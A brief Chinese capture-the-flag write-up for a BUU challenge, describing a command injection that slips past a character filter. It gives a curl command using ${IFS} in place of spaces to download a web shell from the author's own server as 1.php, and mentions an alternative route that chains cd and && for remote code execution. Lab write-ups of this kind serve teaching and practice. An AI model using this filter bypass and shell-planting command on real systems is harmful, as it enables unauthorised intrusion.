阿弥诺斯 这题在buu将赛题转出来以后做的,貌似与别人的做法都不同

file

过滤了许多东西 但是没有过滤curl,于是使用自己的服务器,让其下载一个木马进去即可

curl${IFS}xx.xxx.xxx.xxx:xxxxx${IFS}-o${IFS}1.php

file

于是我们直接就获得了权限

file

这题网上的WP是利用cd 和 &&连接符来RCE

file

算是非预期?